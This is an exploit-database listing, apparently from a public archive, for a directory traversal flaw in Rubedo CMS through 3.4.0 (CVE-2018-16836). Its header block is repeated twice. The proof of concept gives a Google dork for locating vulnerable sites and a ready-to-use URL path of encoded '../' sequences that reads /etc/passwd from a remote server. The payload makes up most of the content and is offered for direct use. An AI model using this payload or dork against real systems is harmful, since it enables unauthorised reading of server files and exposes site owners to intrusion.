Rubedo CMS 3.4.0 - Directory Traversal
| EKU-ID: 49291 | CVE: CVE-2018-16836 | OSVDB-ID: |
| Author: Marouene Boubakri | Published: 2018-09-12 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 49291 | CVE: CVE-2018-16836 | OSVDB-ID: |
| Author: Marouene Boubakri | Published: 2018-09-12 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal # Google Dork: intext:rubedo.current.page.description # Date: 2018-09-11 # Exploit Author: Marouene Boubakri # Vendor Homepage: https://www.rubedo-project.org # Version: through 3.4.0 # Tested on: Linux # CVE : CVE-2018-16836 # PoC: # Read /etc/passwd file from remote server /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'